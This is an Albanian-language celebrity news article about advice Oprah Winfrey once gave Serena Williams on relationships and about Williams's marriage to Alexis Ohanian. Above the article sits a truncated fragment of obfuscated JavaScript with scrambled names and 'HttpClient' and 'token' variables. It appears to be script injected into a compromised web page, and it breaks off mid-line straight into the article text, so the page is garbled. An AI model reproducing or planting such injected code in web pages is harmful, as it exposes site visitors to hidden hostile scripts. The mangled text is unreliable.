;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Një tregim të famshmesh – Kjo është këshilla që Serena Williams e mori nga Oprah për lidhjet e dashurisë

By

Serena Williams e ka zbuluar këshillën tejet influencuese që Oprah Winfrey ia kishte dhënë njëherë asaj, e po ashtu ka zbuluar se gjithmonë lidhjet romantike e kishin mbajtur si peng dhe e kishin penguar në karrierë.

Fituesja e 23 fishtë e Grand Slam, është martuar në vitin 2017-të me themeluesin e Reddit Alexis Ohanian, dy muaj pasi vajza e tyre Alexis Olympia kishte lindur.

Para se të martohej Serena thotë se as që po e mendonte të lidhej me ndokënd, derisa ishte njoftuar me Ohanian në maj të vitit 2015-të.

“Isha e përkushtuar në punën time dhe qëllimi ishte të isha më e mira dhe të punoja fort”, ka thënë Serena në intervistën e saj të fundit për revistën Allure.

Ndërsa ajo thotë se derisa nuk e kishte takuar partnerin me të cilin u martua, ajo nuk e kishte ndjerë kujdesin dhe dashurinë në këtë mënyrë nga ish-at e saj.

E po ashtu e ka treguar një këshillë me vlerë të madhe që njëherë ia kishte dhënë Oprah Winfrey.

“Mos e lejo kurrë aski të ta marrë shkëlqimin”, i kishte thënë moderatorja e famshme, ndërsa Serena thotë se Alexis, burri i saj, jo që s’ia merr shkëlqimin, por e shtyn drejt dritës! /Prive.al

Artikuj të ngjashëm